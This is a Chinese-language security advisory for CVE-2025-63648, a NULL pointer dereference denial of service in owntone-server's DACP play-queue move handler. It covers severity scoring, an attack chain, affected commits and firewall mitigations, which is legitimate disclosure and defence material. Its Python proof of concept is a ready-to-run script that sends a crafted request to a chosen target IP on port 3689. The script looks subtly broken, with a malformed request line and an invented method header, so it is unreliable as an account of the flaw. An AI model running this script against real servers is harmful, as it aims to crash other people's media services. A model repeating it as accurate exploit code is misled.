CVE-2025-63648: owntone-server dacp_reply_playqueueedit_move函数空指针解引用拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-63648

漏洞类型

空指针解引用

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

owntone-server

漏洞概述

CVE-2025-63648是owntone-server项目中的一个高危拒绝服务漏洞。该漏洞存在于dacp_reply_playqueueedit_move函数中，攻击者可以通过发送精心构造的DACP（DAAP协议控制）请求触发空指针解引用，导致服务器崩溃，从而造成拒绝服务攻击。owntone-server是一个开源的DAAP/DPAP媒体服务器实现，广泛用于在本地网络中提供音乐流媒体服务。由于该漏洞的攻击复杂度较低且无需认证即可利用，远程攻击者可以通过网络直接对目标服务器发起攻击，无需任何前置条件或用户交互。此漏洞的可用性影响评估为高，表明攻击成功后将严重影响服务的可用性。CVSS 3.1评分达到7.5分，属于高危级别漏洞，需要尽快进行修复或采取缓解措施。

技术细节

该漏洞位于owntone-server的src/httpd_dacp.c文件中的dacp_reply_playqueueedit_move函数。漏洞的根本原因是在处理DACP请求时，函数未能正确验证指针的有效性就直接进行解引用操作。当攻击者发送特制的DACP请求时，函数内部的某个关键指针被设置为NULL，随后的解引用操作将导致程序崩溃。具体来说，dacp_reply_playqueueedit_move函数在处理播放队列编辑移动请求时，依赖于某些内部数据结构的有效性，但在特定条件下这些数据结构可能未被正确初始化或已被释放。攻击者可以通过构造包含特定参数的DACP请求包来触发这一条件，导致空指针解引用。服务器在接收到恶意请求后会立即崩溃，终止所有正在运行的服务并断开所有客户端连接。由于服务器通常以守护进程方式运行，崩溃后需要手动重启才能恢复服务，这在生产环境中会造成严重的服务中断。攻击者可以反复发送此类请求，实现对服务的持续拒绝服务攻击。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标服务器上运行的owntone-server服务，确认其版本和监听端口（默认3689）

STEP 2

步骤2: 构造恶意请求

攻击者构造包含特殊参数的DACP请求，特别是针对playqueueedit-move方法的请求，以触发dacp_reply_playqueueedit_move函数中的空指针条件

STEP 3

步骤3: 发送攻击载荷

通过TCP连接到目标服务器的DACP端口，发送精心构造的恶意DACP请求包

STEP 4

步骤4: 触发漏洞

服务器处理恶意请求时，dacp_reply_playqueueedit_move函数尝试解引用NULL指针，导致程序崩溃

STEP 5

步骤5: 拒绝服务

服务器进程终止，所有客户端连接断开，服务不可用。攻击者可重复发送请求实现持续拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import struct

def send_dacp_request(target_ip, target_port=3689):
    """
    PoC for CVE-2025-63648: NULL pointer dereference in 
    dacp_reply_playqueueedit_move function
    
    This PoC sends a crafted DACP request to trigger the vulnerability
    in owntone-server.
    """
    dacp_request = b'crlf\r\n'
    dacp_request += b'Content-Type: application/x-dmap-tagged\r\n'
    dacp_request += b'Client-Name: PoC-Client\r\n'
    dacp_request += b'Method: playqueueedit-move\r\n'
    dacp_request += b'Revision: 1\r\n'
    dacp_request += b'\r\n'
    dacp_request += b'\x00\x00\x00\x00' * 10
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        
        sock.sendall(dacp_request)
        print(f'[+] Crafted DACP request sent to {target_ip}:{target_port}')
        print('[+] Waiting for server response...')
        
        response = sock.recv(4096)
        print(f'[*] Server response: {response[:100]}')
        sock.close()
        
    except socket.timeout:
        print('[+] Server may have crashed (timeout)')
    except ConnectionRefusedError:
        print('[-] Connection refused')
    except Exception as e:
        print(f'[-] Error: {e}')

if __name__ == '__main__':
    import sys
    if len(sys.argv) < 2:
        print(f'Usage: python {sys.argv[0]} <target_ip> [port]')
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 3689
    send_dacp_request(target, port)

影响范围

owntone-server < commit b7e385f

owntone-server commit b7e385f

防御指南

临时缓解措施

在官方修复发布之前，可以通过配置防火墙规则限制对owntone-server DACP服务端口（默认3689）的访问，只允许受信任的IP地址连接。同时建议启用日志监控，密切关注服务器日志中的异常DACP请求模式，以便及时发现和阻止潜在的攻击尝试。对于必须暴露在互联网的服务，应考虑使用VPN或SSH隧道等方式进行安全访问控制。